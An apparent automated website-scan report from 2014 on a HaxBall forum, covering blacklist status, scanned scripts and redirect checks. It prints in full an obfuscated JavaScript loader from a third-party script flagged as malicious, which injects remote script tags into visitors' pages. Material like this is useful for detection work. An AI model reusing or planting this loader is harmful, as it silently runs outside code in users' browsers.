Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=haxball-galaxy.forumotion.cc
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://haxball-galaxy.forumotion.cc/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://haxball-galaxy.forumotion.cc/ | 200 OK Content-Length: 82544 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js | 200 OK Content-Length: 94840 Content-Type: text/javascript | clean |
http://illiweb.com/rsc/60/frm/lang/en.js | 200 OK Content-Length: 67924 Content-Type: application/x-javascript | clean |
http://partner.googleadservices.com/gampad/google_service.js | 200 OK Content-Length: 3868 Content-Type: text/javascript | clean |
http://api.leaguerepublic.com/l/client/api/cs1.js | 200 OK Content-Length: 976 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var _0x679b=["\x6E\x75\x6D\x43\x6F\x64\x65\x53\x6E\x69\x70\x70\x65\x74\x73","\x72\x61\x6E\x64\x6F\x6D","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F\x61\x70\x69\x2E\x6C\x65\x61\x67\x75\x65\x72\x65\x70\x75\x62\x6C\x69\x63\x2E\x63\x6F\x6D\x2F\x6C\x2F\x6A\x73\x2F\x63\x73\x31\x2E\x68\x74\x6D\x6C\x3F\x63\x73\x3D","\x26\x72\x61\x6E\x64\x6F\x6D\x3D","\x74\x79\x70\x65","\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65"];if(window[_0x679b[0]]==undefined){window[_0x679b[0]]=1;} else {window[_0x679b[0]]++;} ;if(window[_0x679b[0]]<=12){var randno=Math[_0x679b[1]]();var el=document[_0x679b[3]](_0x679b[2]);el[_0x679b[4]]=_0x679b[5]+lrcode+_0x679b[6]+randno;el[_0x679b[7]]=_0x679b[8];document[_0x679b[11]](_0x679b[10])[0][_0x679b[9]](el);} ; Antivirus reports:
http://haxball-galaxy.forumotion.cc/h2-live-stream | 200 OK Content-Length: 29682 Content-Type: text/html | clean |
http://haxball-galaxy.forumotion.cc/faq | 200 OK Content-Length: 57030 Content-Type: text/html | clean |
http://illiweb.com/rsc/60/frm/collapsible_faq.js | 200 OK Content-Length: 1103 Content-Type: application/x-javascript | clean |
http://haxball-galaxy.forumotion.cc/search | 200 OK Content-Length: 53111 Content-Type: text/html | clean |
http://illiweb.com/rsc/60/frm/extendedview.js | 200 OK Content-Length: 1445 Content-Type: application/x-javascript | clean |
http://haxball-galaxy.forumotion.cc/memberlist | 200 OK Content-Length: 66994 Content-Type: text/html | clean |
http://haxball-galaxy.forumotion.cc/groups | 200 OK Content-Length: 31684 Content-Type: text/html | clean |
http://haxball-galaxy.forumotion.cc/register | 200 OK Content-Length: 32591 Content-Type: text/html | clean |
http://haxball-galaxy.forumotion.cc/login | 200 OK Content-Length: 31488 Content-Type: text/html | clean |
http://haxball-galaxy.forumotion.cc/privmsg?folder=inbox | HTTP/1.1 302 Moved Temporarily Connection: close Date: Fri, 25 Jul 2014 16:33:39 GMT Location: http://haxball-galaxy.forumotion.cc/login?redirect=%2Fprivmsg%3Ffolder%3Dinbox Content-Length: 0 | clean |
http://haxball-galaxy.forumotion.cc/login?redirect=%2fprivmsg%3ffolder%3dinbox | 200 OK Content-Length: 31846 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: haxball-galaxy.forumotion.cc
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Fri, 25 Jul 2014 16:33:26 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Fri, 25 Jul 2014 00:00:00 GMT
Last-Modified: Fri, 25 Jul 2014 16:33:25 GMT
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Second query (visit from search engine):
GET / HTTP/1.1
Host: haxball-galaxy.forumotion.cc
Referer: http://www.google.com/search?q=haxball-galaxy.forumotion.cc
Result:
The result is similar to the first query. There are no suspicious redirects found.